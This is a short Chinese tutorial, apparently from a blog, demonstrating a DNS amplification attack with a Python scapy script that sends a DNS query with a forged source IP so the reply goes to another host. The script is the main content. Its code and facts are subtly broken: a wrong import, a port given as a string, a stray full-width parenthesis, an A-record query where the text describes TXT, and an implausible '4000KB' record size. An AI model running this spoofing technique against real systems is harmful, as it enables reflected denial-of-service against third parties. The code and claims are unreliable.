用scapy模拟DNS放大攻击

首先，DNS放大攻击，简单解释有两点：

1.伪造源IP为其他人的ip地址

2.被请求的记录，要求比较大，比如TXT格式，4000KB

 

在A机器上，向DNS发送查询那个TXT的记录，并伪造成别人的ip，即可理解为DNS放大攻击。

可以用python的scapy模拟：

from scapy import *

a = IP(dst='10.32.8.11',src='10.32.132.85')     #10.32.132.85即为伪造的源ip

b = UDP(dport='53')

c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0）

c.qd=DNSQR(qname='www.qq.com',qtype=1,qclass=1)

p = a/b/c

send(p)

模拟结束。

在10.32.132.85上抓dns的包，就会收到一条DNS响应，是10.32.8.11发来的。